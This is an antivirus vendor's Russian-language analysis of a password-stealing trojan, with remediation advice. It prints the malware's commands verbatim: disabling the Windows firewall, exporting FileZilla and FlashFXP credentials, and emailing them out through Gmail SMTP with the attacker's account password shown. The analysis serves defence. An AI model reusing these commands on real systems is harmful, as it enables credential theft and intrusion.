Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.PWS.Siggen.39584

Добавлен в вирусную базу Dr.Web: 2012-08-14

Описание добавлено:

Техническая информация

Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Создает и запускает на исполнение:
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to user_hug@gmail.com -subject FileZilla (.xml) -attachment "%PROGRAM_FILES%"\FileZilla\FileZilla.xml -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password YBujCKqXLgYbnd
  • <SYSTEM32>\ csrss.exe -r -j "%HOMEPATH%\Local Settings\Temp"\ffxp.zip "%PROGRAM_FILES%"\FlashFXP\*.dat
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to user_hug@gmail.com -subject FlashFXP (.dat) -attachment "%HOMEPATH%\Local Settings\Temp"\ffxp.zip -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password YBujCKqXLgYbnd
  • <SYSTEM32>\ svchost.exe
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to user_hug@gmail.com -subject Compte(s) MSN -attachment <SYSTEM32>\Pass.txt -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password YBujCKqXLgYbnd
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to user_hug@gmail.com -subject FileZilla registre -attachment "%HOMEPATH%\Local Settings\Temp"\fz.txt -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password YBujCKqXLgYbnd
Запускает на исполнение:
  • <SYSTEM32>\reg.exe export "HKEY_CURRENT_USER\Software\FileZilla\Recent Servers" "%HOMEPATH%\Local Settings\Temp"\fz.txt
  • <SYSTEM32>\netsh.exe firewall set opmode disable
  • <SYSTEM32>\ntvdm.exe -f -i1 -w -a <SYSTEM32>\krnl386.exe
Внедряет код в
следующие системные процессы:
  • <SYSTEM32>\ntvdm.exe
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами:
  • [<HKCU>\Software\Microsoft\MSNMessenger]
  • [<HKCU>\Software\Microsoft\MessengerService]
Изменения в файловой системе:
Создает следующие файлы:
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.new
  • <SYSTEM32>\Pass.txt
  • %WINDIR%\Temp\scs2.tmp
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch.new
  • %APPDATA%\Microsoft\CLR Security Config\v1.1.4322\security.config.cch.new
  • %APPDATA%\Microsoft\CLR Security Config\v1.1.4322\security.config.new
  • <LS_APPDATA>\ApplicationHistory\ iexplore.exe.e2c06d0a.ini
  • %WINDIR%\Temp\scs1.tmp
  • %TEMP%\fichier.exe
  • %TEMP%\$inst\temp_0.tmp
  • %TEMP%\$inst\2.tmp
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe
  • <SYSTEM32>\ csrss.exe
  • <SYSTEM32>\ svchost.exe
  • <SYSTEM32>\MSCOMCTL.OCX
Удаляет следующие файлы:
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch.3108.140265
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.3200.147593
  • %APPDATA%\Microsoft\CLR Security Config\v1.1.4322\security.config.cch.3260.163328
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.3108.140265
  • %TEMP%\$inst\temp_0.tmp
  • %WINDIR%\Temp\scs1.tmp
  • %WINDIR%\Temp\scs2.tmp
Перемещает следующие системные файлы:
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch в %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch.3108.140265
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch в %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.3108.140265
Сетевая активность:
Подключается к:
  • 'sm##.gmail.com':465
  • 'ha#####24.ifrance.com':80
  • 'localhost':1037
UDP:
  • DNS ASK sm##.gmail.com
  • DNS ASK ha#####24.ifrance.com
Другое:
Ищет следующие окна:
  • ClassName: 'MS_AutodialMonitor' WindowName: ''
  • ClassName: 'MS_WebcheckMonitor' WindowName: ''
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: 'WOWFaxClass' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке